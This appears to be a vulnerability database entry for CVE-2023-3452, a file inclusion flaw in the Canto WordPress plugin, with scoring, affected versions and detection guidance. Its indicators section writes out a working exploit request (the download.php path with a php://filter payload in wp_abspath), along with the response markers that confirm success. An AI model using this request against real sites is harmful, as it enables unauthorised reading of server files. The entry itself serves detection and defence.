cbcvebase.
CVE-2023-3452
published 2023-08-12

CVE-2023-3452: The Canto plugin for WordPress is vulnerable to Remote File Inclusion in versions up to, and including, 3.0.4 via the 'wp_abspath' parameter. This allows…

PriorityP272critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
5.62%
92.0th percentile
The Canto plugin for WordPress is vulnerable to Remote File Inclusion in versions up to, and including, 3.0.4 via the 'wp_abspath' parameter. This allows unauthenticated attackers to include and execute arbitrary remote code on the server, provided that allow_url_include is enabled. Local File Inclusion is also possible, albeit less useful because it requires that the attacker be able to upload a malicious php file via FTP or some other means into a directory readable by the web server.

Affected

2 ranges
VendorProductVersion rangeFixed in
cantocanto<= 3.0.4
flightbycantocanto<= 3.0.4

Detection & IOCsextracted from sources · hover to see the quote

path/wp-content/plugins/canto/includes/lib/download.php
path/wp-content/plugins/canto/readme.txt
url/wp-content/plugins/canto/includes/lib/download.php?wp_abspath=php://filter/convert.base64-encode/resource=/var/www/html
filenameadmin.php
pathwp-admin/admin.php
commandwp_abspath=php://filter/convert.base64-encode/resource=/var/www/html
otherPD9waHAK
otherV29yZFByZXNz
  • Detect exploitation attempts by monitoring GET requests to the vulnerable endpoint with a 'wp_abspath' parameter containing a remote URL or PHP stream wrapper (e.g., php://).
  • Flag HTTP requests to /wp-content/plugins/canto/includes/lib/download.php with a 'wp_abspath' query parameter as a strong indicator of CVE-2023-3452 exploitation.
  • Nuclei detection: check response body for both base64 strings 'PD9waHAK' and 'V29yZFByZXNz' with HTTP 200 to confirm successful LFI/RFI exploitation.
  • Unauthenticated attackers exploit the 'wp_abspath' parameter; no authentication headers or cookies are required, so any unauthenticated request to the download.php endpoint with this parameter should be alerted.
  • Monitor for outbound HTTP connections from the web server process (e.g., php-fpm, apache) to attacker-controlled hosts, which would indicate successful RFI via allow_url_include.
  • Detect version fingerprinting attempts against the Canto plugin by monitoring GET requests to /wp-content/plugins/canto/readme.txt, which precedes exploitation in the Nuclei template.
  • ·Remote File Inclusion (RFI) exploitation requires the PHP 'allow_url_include' directive to be enabled on the target server. If this is disabled, only Local File Inclusion (LFI) is possible.
  • ·Local File Inclusion is less impactful as it requires the attacker to first upload a malicious PHP file via FTP or another method into a web-readable directory.
  • ·The vulnerability affects Canto plugin versions up to and including 3.0.4; version detection via readme.txt is used by the Nuclei template to gate exploitation checks.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.